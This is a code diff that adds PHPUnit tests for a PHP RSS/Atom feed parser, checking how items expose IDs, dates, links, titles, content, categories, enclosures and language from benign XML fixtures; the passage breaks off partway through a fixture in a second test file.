+    <id>id-23</id>
+  </entry>
+</feed>';
+
+    // =========================================================================
+    // Fixtures — get_description()
+    // =========================================================================
+
+    private const ATOM1_ITEM_SUMMARY_TEXT = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>Summary Text</title>
+    <link href="https://example.com/24" rel="alternate"/>
+    <id>id-24</id>
+    <summary>Summary description text</summary>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_SUMMARY_XHTML = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>Summary XHTML</title>
+    <link href="https://example.com/25" rel="alternate"/>
+    <id>id-25</id>
+    <summary type="xhtml" xmlns="http://www.w3.org/1999/xhtml">
+      <div xmlns="http://www.w3.org/1999/xhtml">
+        <p>XHTML summary</p>
+      </div>
+    </summary>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_NO_SUMMARY = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>No Summary</title>
+    <link href="https://example.com/26" rel="alternate"/>
+    <id>id-26</id>
+  </entry>
+</feed>';
+
+    // =========================================================================
+    // Fixtures — get_categories()
+    // =========================================================================
+
+    private const ATOM1_ITEM_CATEGORIES_TERM = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>Categories Term</title>
+    <link href="https://example.com/27" rel="alternate"/>
+    <id>id-27</id>
+    <category term="Technology"/>
+    <category term="Programming" scheme="http://example.com/scheme"/>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_CATEGORIES_DC_SUBJECT = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom"
+      xmlns:dc="http://purl.org/dc/elements/1.1/">
+  <title>Test</title>
+  <entry>
+    <title>DC Subject</title>
+    <link href="https://example.com/28" rel="alternate"/>
+    <id>id-28</id>
+    <dc:subject>Science</dc:subject>
+    <dc:subject>Research</dc:subject>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_CATEGORIES_BOTH = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom"
+      xmlns:dc="http://purl.org/dc/elements/1.1/">
+  <title>Test</title>
+  <entry>
+    <title>Both Categories</title>
+    <link href="https://example.com/29" rel="alternate"/>
+    <id>id-29</id>
+    <category term="News"/>
+    <dc:subject>World</dc:subject>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_NO_CATEGORIES = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>No Categories</title>
+    <link href="https://example.com/30" rel="alternate"/>
+    <id>id-30</id>
+  </entry>
+</feed>';
+
+    // =========================================================================
+    // Fixtures — get_enclosures()
+    // =========================================================================
+
+    private const ATOM1_ITEM_ENCLOSURE = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>Enclosure</title>
+    <link href="https://example.com/31" rel="alternate"/>
+    <link href="https://example.com/podcast.mp3"
+          rel="enclosure"
+          type="audio/mpeg"
+          length="1234567"/>
+    <id>id-31</id>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_ENCLOSURE_WITH_BASE = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom" xml:base="https://cdn.example.com/">
+  <title>Test</title>
+  <entry>
+    <title>Enclosure With Base</title>
+    <link href="https://example.com/32" rel="alternate"/>
+    <link href="relative/audio.mp3"
+          rel="enclosure"
+          type="audio/mpeg"
+          length="999"/>
+    <id>id-32</id>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_ENCLOSURE_NO_REL = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>No Rel Enclosure</title>
+    <link href="https://example.com/33" rel="alternate"/>
+    <link href="https://example.com/file.bin" type="application/octet-stream"/>
+    <id>id-33</id>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_ENCLOSURE_MEDIA = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom"
+      xmlns:media="http://search.yahoo.com/mrss/">
+  <title>Test</title>
+  <entry>
+    <title>Media Enclosure</title>
+    <link href="https://example.com/34" rel="alternate"/>
+    <link href="https://example.com/podcast.mp3"
+          rel="enclosure"
+          type="audio/mpeg"
+          length="555"/>
+    <media:content url="https://example.com/video.mp4"
+                   type="video/mp4"/>
+    <id>id-34</id>
+  </entry>
+</feed>';
+
+    // =========================================================================
+    // Fixtures — get_language()
+    // =========================================================================
+
+    private const ATOM1_ITEM_LANG_ENTRY = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry xml:lang="en-US">
+    <title>Entry Lang</title>
+    <link href="https://example.com/35" rel="alternate"/>
+    <id>id-35</id>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_LANG_FEED_FALLBACK = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr-FR">
+  <title>Test</title>
+  <entry>
+    <title>Feed Lang Fallback</title>
+    <link href="https://example.com/36" rel="alternate"/>
+    <id>id-36</id>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_LANG_ENTRY_OVERRIDES_FEED = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="ja">
+  <title>Test</title>
+  <entry xml:lang="de-AT">
+    <title>Entry Overrides Feed</title>
+    <link href="https://example.com/37" rel="alternate"/>
+    <id>id-37</id>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_NO_LANG = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>No Lang</title>
+    <link href="https://example.com/38" rel="alternate"/>
+    <id>id-38</id>
+  </entry>
+</feed>';
+
+    // =========================================================================
+    // Fixtures — multiple entries
+    // =========================================================================
+
+    private const ATOM1_MULTIPLE_ENTRIES = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>First Entry</title>
+    <link href="https://example.com/a" rel="alternate"/>
+    <id>id-a</id>
+    <updated>2024-01-01T00:00:00Z</updated>
+  </entry>
+  <entry>
+    <title>Second Entry</title>
+    <link href="https://example.com/b" rel="alternate"/>
+    <id>id-b</id>
+    <published>2023-06-15T12:00:00Z</published>
+  </entry>
+  <entry>
+    <title>Third Entry</title>
+    <link href="https://example.com/c" rel="alternate"/>
+    <id>id-c</id>
+  </entry>
+</feed>';
+
+    // =========================================================================
+    // get_id()
+    // =========================================================================
+
+    public function test_get_id_with_id_element(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_WITH_ID);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $this->assertEquals("urn:uuid:abc123", $item->get_id());
+    }
+
+    public function test_get_id_fallback_to_link(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_NO_ID);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $this->assertEquals("https://example.com/2", $item->get_id());
+    }
+
+    public function test_get_id_does_not_trim_id(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_ID_WITH_WHITESPACE);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        // get_id returns raw nodeValue, not cleaned
+        $this->assertEquals("  urn:uuid:whitespace  ", $item->get_id());
+    }
+
+    // =========================================================================
+    // get_date()
+    // =========================================================================
+
+    public function test_get_date_updated(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_UPDATED);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $date = $item->get_date();
+        $this->assertIsInt($date);
+        $this->assertEquals(strtotime("2024-01-15T10:30:00Z"), $date);
+    }
+
+    public function test_get_date_published(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_PUBLISHED);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $date = $item->get_date();
+        $this->assertIsInt($date);
+        $this->assertEquals(strtotime("2023-06-20T08:00:00Z"), $date);
+    }
+
+    public function test_get_date_prefers_updated_over_published(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_BOTH_UPDATED_AND_PUBLISHED);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $date = $item->get_date();
+        $this->assertIsInt($date);
+        // Should use updated, not published
+        $this->assertEquals(strtotime("2024-03-01T12:00:00Z"), $date);
+        $this->assertNotEquals(strtotime("2023-01-01T00:00:00Z"), $date);
+    }
+
+    public function test_get_date_dc_date(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_DC_DATE);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $date = $item->get_date();
+        $this->assertIsInt($date);
+        $this->assertEquals(strtotime("2022-11-11T00:00:00Z"), $date);
+    }
+
+    public function test_get_date_none(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_NO_DATE);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $this->assertFalse($item->get_date());
+    }
+
+    // =========================================================================
+    // get_link()
+    // =========================================================================
+
+    public function test_get_link_rel_alternate(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_LINK_ALTERNATE);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $this->assertEquals("https://example.com/9/alt", $item->get_link());
+    }
+
+    public function test_get_link_rel_standout(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_LINK_STANDOUT);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $this->assertEquals("https://example.com/10/standout", $item->get_link());
+    }
+
+    public function test_get_link_no_rel(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_LINK_NO_REL);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $this->assertEquals("https://example.com/11", $item->get_link());
+    }
+
+    public function test_get_link_ignores_self_rel(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_LINK_SELF_IGNORED);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $this->assertEquals("https://example.com/12/alternate", $item->get_link());
+    }
+
+    public function test_get_link_no_link(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_NO_LINK);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $this->assertEquals("", $item->get_link());
+    }
+
+    public function test_get_link_xml_base(): void {
+        // xml:base on feed root is inherited by entries and used to resolve
+        // relative link hrefs. PHP's DOMXPath * wildcard matches elements in
+        // any namespace, so ancestor-or-self::*[@xml:base] works for Atom feeds.
+        $parser = new FeedParser(self::ATOM1_ITEM_XML_BASE);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $this->assertEquals("https://example.com/relative/path", $item->get_link());
+    }
+
+    public function test_get_link_trims_whitespace(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_LINK_WHITESPACE);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $this->assertEquals("https://example.com/15/trimmed", $item->get_link());
+    }
+
+    // =========================================================================
+    // get_title()
+    // =========================================================================
+
+    public function test_get_title_trims_whitespace(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_TITLE_WITH_WHITESPACE);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $this->assertEquals("Title With Spaces", $item->get_title());
+    }
+
+    public function test_get_title_empty(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_TITLE_EMPTY);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $this->assertEquals("", $item->get_title());
+    }
+
+    public function test_get_title_decodes_entities(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_TITLE_ENTITY);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        // XML parser decodes &amp;amp; to &amp; and &lt; to <, &gt; to >
+        // clean() then applies htmlspecialchars, encoding & and < and >
+        $this->assertStringContainsString("Entity", $item->get_title());
+        $this->assertStringContainsString("amp", $item->get_title());
+    }
+
+    // =========================================================================
+    // get_content()
+    // =========================================================================
+
+    public function test_get_content_text(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_CONTENT_TEXT);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $this->assertEquals("Plain text content", $item->get_content());
+    }
+
+    public function test_get_content_html(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_CONTENT_HTML);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $content = $item->get_content();
+        $this->assertStringContainsString("HTML", $content);
+        $this->assertStringContainsString("strong", $content);
+    }
+
+    public function test_get_content_xhtml(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_CONTENT_XHTML);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $content = $item->get_content();
+        $this->assertStringContainsString("XHTML content", $content);
+    }
+
+    public function test_get_content_no_content(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_NO_CONTENT);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $this->assertEquals("", $item->get_content());
+    }
+
+    public function test_get_content_rewrites_relative_urls(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_CONTENT_WITH_BASE);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $content = $item->get_content();
+        $this->assertStringContainsString("https://cdn.example.com/images/photo.jpg", $content);
+    }
+
+    // =========================================================================
+    // get_description()
+    // =========================================================================
+
+    public function test_get_description_text(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_SUMMARY_TEXT);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $this->assertEquals("Summary description text", $item->get_description());
+    }
+
+    public function test_get_description_xhtml(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_SUMMARY_XHTML);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $desc = $item->get_description();
+        $this->assertStringContainsString("XHTML summary", $desc);
+    }
+
+    public function test_get_description_none(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_NO_SUMMARY);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $this->assertEquals("", $item->get_description());
+    }
+
+    // =========================================================================
+    // get_categories()
+    // =========================================================================
+
+    public function test_get_categories_term(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_CATEGORIES_TERM);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $cats = $item->get_categories();
+        $this->assertCount(2, $cats);
+        $this->assertContains("technology", $cats);
+        $this->assertContains("programming", $cats);
+    }
+
+    public function test_get_categories_dc_subject(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_CATEGORIES_DC_SUBJECT);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $cats = $item->get_categories();
+        $this->assertCount(2, $cats);
+        $this->assertContains("science", $cats);
+        $this->assertContains("research", $cats);
+    }
+
+    public function test_get_categories_both(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_CATEGORIES_BOTH);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $cats = $item->get_categories();
+        $this->assertEquals(["news", "world"], $cats);
+    }
+
+    public function test_get_categories_none(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_NO_CATEGORIES);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $this->assertEmpty($item->get_categories());
+    }
+
+    // =========================================================================
+    // get_enclosures()
+    // =========================================================================
+
+    public function test_get_enclosure_rel_enclosure(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_ENCLOSURE);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $encs = $item->get_enclosures();
+        $this->assertCount(1, $encs);
+        $this->assertEquals("https://example.com/podcast.mp3", $encs[0]->link);
+        $this->assertEquals("audio/mpeg", $encs[0]->type);
+        $this->assertEquals("1234567", $encs[0]->length);
+    }
+
+    public function test_get_enclosure_rewrites_relative_with_base(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_ENCLOSURE_WITH_BASE);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $encs = $item->get_enclosures();
+        $this->assertCount(1, $encs);
+        $this->assertEquals("https://cdn.example.com/relative/audio.mp3", $encs[0]->link);
+    }
+
+    public function test_get_enclosure_ignores_non_enclosure_links(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_ENCLOSURE_NO_REL);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $encs = $item->get_enclosures();
+        $this->assertEmpty($encs);
+    }
+
+    public function test_get_enclosure_combined_with_media(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_ENCLOSURE_MEDIA);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $encs = $item->get_enclosures();
+        // rel=enclosure link + media:content = 2 enclosures
+        $this->assertCount(2, $encs);
+    }
+
+    // =========================================================================
+    // get_language()
+    // =========================================================================
+
+    public function test_get_language_entry_lang(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_LANG_ENTRY);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $this->assertEquals("en-US", $item->get_language());
+    }
+
+    public function test_get_language_feed_fallback(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_LANG_FEED_FALLBACK);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $this->assertEquals("fr-FR", $item->get_language());
+    }
+
+    public function test_get_language_entry_overrides_feed(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_LANG_ENTRY_OVERRIDES_FEED);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $this->assertEquals("de-AT", $item->get_language());
+    }
+
+    public function test_get_language_none(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_NO_LANG);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        /** @var \FeedItem_Atom $item */
+        $item = $items[0];
+        $this->assertEquals("", $item->get_language());
+    }
+
+    // =========================================================================
+    // Multiple entries — ensure each entry is parsed independently
+    // =========================================================================
+
+    public function test_multiple_entries_have_independent_ids(): void {
+        $parser = new FeedParser(self::ATOM1_MULTIPLE_ENTRIES);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $this->assertCount(3, $items);
+        $this->assertEquals("id-a", $items[0]->get_id());
+        $this->assertEquals("id-b", $items[1]->get_id());
+        $this->assertEquals("id-c", $items[2]->get_id());
+    }
+
+    public function test_multiple_entries_have_independent_dates(): void {
+        $parser = new FeedParser(self::ATOM1_MULTIPLE_ENTRIES);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $this->assertIsInt($items[0]->get_date());
+        $this->assertEquals(strtotime("2024-01-01T00:00:00Z"), $items[0]->get_date());
+
+        $this->assertIsInt($items[1]->get_date());
+        $this->assertEquals(strtotime("2023-06-15T12:00:00Z"), $items[1]->get_date());
+
+        $this->assertFalse($items[2]->get_date());
+    }
+
+    public function test_multiple_entries_have_independent_links(): void {
+        $parser = new FeedParser(self::ATOM1_MULTIPLE_ENTRIES);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $this->assertEquals("https://example.com/a", $items[0]->get_link());
+        $this->assertEquals("https://example.com/b", $items[1]->get_link());
+        $this->assertEquals("https://example.com/c", $items[2]->get_link());
+    }
+
+    public function test_multiple_entries_have_independent_titles(): void {
+        $parser = new FeedParser(self::ATOM1_MULTIPLE_ENTRIES);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $this->assertEquals("First Entry", $items[0]->get_title());
+        $this->assertEquals("Second Entry", $items[1]->get_title());
+        $this->assertEquals("Third Entry", $items[2]->get_title());
+    }
+}

--- a/tests_functional/FeedItemCommonTest.php
+++ b/tests_functional/FeedItemCommonTest.php
@@ -1,0 +1,900 @@
+<?php
+use PHPUnit\Framework\TestCase;
+
+/**
+ * Tests for FeedItem_Common shared methods (get_author, get_enclosures,
+ * get_comments_url, get_comments_count, normalize_categories, etc.)
+ *
+ * FeedItem_Common is abstract; we test through its concrete subclasses
+ * FeedItem_RSS and FeedItem_Atom via FeedParser.
+ */
+final class FeedItemCommonTest extends TestCase {
+
+    // =========================================================================
+    // Fixtures — RSS 2.0
+    // =========================================================================
+
+    private const RSS2_ITEM_AUTHOR = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0">
+  <channel>
+    <title>Test</title>
+    <item>
+      <title>Author Test</title>
+      <author><name>Alice Smith</name><email>alice@example.com</email></author>
+      <link>https://example.com/1</link>
+    </item>
+  </channel>
+</rss>';
+
+    private const RSS2_ITEM_AUTHOR_NAME_ONLY = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0">
+  <channel>
+    <title>Test</title>
+    <item>
+      <title>Author Name Only</title>
+      <author><name>Bob Jones</name></author>
+      <link>https://example.com/2</link>
+    </item>
+  </channel>
+</rss>';
+
+    private const RSS2_ITEM_AUTHOR_EMAIL_ONLY = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0">
+  <channel>
+    <title>Test</title>
+    <item>
+      <title>Author Email Only</title>
+      <author><email>bob@example.com</email></author>
+      <link>https://example.com/3</link>
+    </item>
+  </channel>
+</rss>';
+
+    private const RSS2_ITEM_AUTHOR_TEXT_ONLY = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0">
+  <channel>
+    <title>Test</title>
+    <item>
+      <title>Author Text Only</title>
+      <author>Charlie Brown</author>
+      <link>https://example.com/4</link>
+    </item>
+  </channel>
+</rss>';
+
+    private const RSS2_ITEM_DC_CREATOR = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0"
+     xmlns:dc="http://purl.org/dc/elements/1.1/">
+  <channel>
+    <title>Test</title>
+    <item>
+      <title>DC Creator</title>
+      <dc:creator>Dave Author</dc:creator>
+      <dc:creator>Eve Writer</dc:creator>
+      <link>https://example.com/5</link>
+    </item>
+  </channel>
+</rss>';
+
+    private const RSS2_ITEM_NO_AUTHOR = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0">
+  <channel>
+    <title>Test</title>
+    <item>
+      <title>No Author</title>
+      <link>https://example.com/6</link>
+    </item>
+  </channel>
+</rss>';
+
+    private const RSS2_ITEM_COMMENTS = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0">
+  <channel>
+    <title>Test</title>
+    <item>
+      <title>Comments Test</title>
+      <link>https://example.com/7</link>
+      <comments>https://example.com/7/comments</comments>
+    </item>
+  </channel>
+</rss>';
+
+    private const RSS2_ITEM_COMMENTS_COUNT = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0"
+     xmlns:slash="http://purl.org/rss/1.0/modules/slash/">
+  <channel>
+    <title>Test</title>
+    <item>
+      <title>Comments Count</title>
+      <link>https://example.com/8</link>
+      <slash:comments>42</slash:comments>
+    </item>
+  </channel>
+</rss>';
+
+    private const RSS2_ITEM_MEDIA_CONTENT = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0"
+     xmlns:media="http://search.yahoo.com/mrss/">
+  <channel>
+    <title>Test</title>
+    <item>
+      <title>Media Content</title>
+      <link>https://example.com/9</link>
+      <media:content url="https://example.com/video.mp4"
+                     type="video/mp4"
+                     length="123456"
+                     height="720"
+                     width="1280">
+        <media:description>Video description</media:description>
+      </media:content>
+    </item>
+  </channel>
+</rss>';
+
+    private const RSS2_ITEM_MEDIA_THUMBNAIL = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0"
+     xmlns:media="http://search.yahoo.com/mrss/">
+  <channel>
+    <title>Test</title>
+    <item>
+      <title>Media Thumbnail</title>
+      <link>https://example.com/10</link>
+      <media:thumbnail url="https://example.com/thumb.jpg"
+                       height="360"
+                       width="640"/>
+    </item>
+  </channel>
+</rss>';
+
+    private const RSS2_ITEM_ENCLOSURE = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0">
+  <channel>
+    <title>Test</title>
+    <item>
+      <title>Enclosure</title>
+      <link>https://example.com/11</link>
+      <enclosure url="https://example.com/audio.mp3"
+                 type="audio/mpeg"
+                 length="987654"/>
+    </item>
+  </channel>
+</rss>';
+
+    private const RSS2_ITEM_CATEGORIES = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0"
+     xmlns:dc="http://purl.org/dc/elements/1.1/">
+  <channel>
+    <title>Test</title>
+    <item>
+      <title>Categories</title>
+      <link>https://example.com/12</link>
+      <category>Technology</category>
+      <category>Programming, Web</category>
+      <dc:subject>Design</dc:subject>
+    </item>
+  </channel>
+</rss>';
+
+    private const RSS2_ITEM_SOURCE_REMOVED = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0">
+  <channel>
+    <title>Test</title>
+    <item>
+      <title>Source Removal</title>
+      <link>https://example.com/13</link>
+      <source url="https://example.com/source.rss">Source Feed</source>
+    </item>
+  </channel>
+</rss>';
+
+    // =========================================================================
+    // Fixtures — Atom 1.0
+    // =========================================================================
+
+    private const ATOM1_ITEM_AUTHOR = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>Atom Author</title>
+    <author><name>Atom Author</name><email>atom@example.com</email></author>
+    <link href="https://example.com/atom/1" rel="alternate"/>
+    <id>atom-id-1</id>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_REPLIES = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>Atom Replies</title>
+    <link href="https://example.com/atom/2" rel="alternate"/>
+    <link href="https://example.com/atom/2/replies"
+          rel="replies"
+          type="text/html"/>
+    <id>atom-id-2</id>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_THREADED_REPLIES = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom"
+      xmlns:thread="http://purl.org/syndication/thread/1.0">
+  <title>Test</title>
+  <entry>
+    <title>Threaded Replies</title>
+    <link href="https://example.com/atom/3" rel="alternate"/>
+    <link href="https://example.com/atom/3/replies"
+          rel="replies"
+          thread:count="7"/>
+    <id>atom-id-3</id>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_MEDIA_CONTENT = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom"
+      xmlns:media="http://search.yahoo.com/mrss/">
+  <title>Test</title>
+  <entry>
+    <title>Atom Media</title>
+    <link href="https://example.com/atom/4" rel="alternate"/>
+    <id>atom-id-4</id>
+    <media:content url="https://example.com/atom-video.mp4"
+                   type="video/mp4"
+                   length="555555"/>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_ENCLOSURE_LINK = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>Atom Enclosure Link</title>
+    <link href="https://example.com/atom/5" rel="alternate"/>
+    <link href="https://example.com/atom-podcast.mp3"
+          rel="enclosure"
+          type="audio/mpeg"
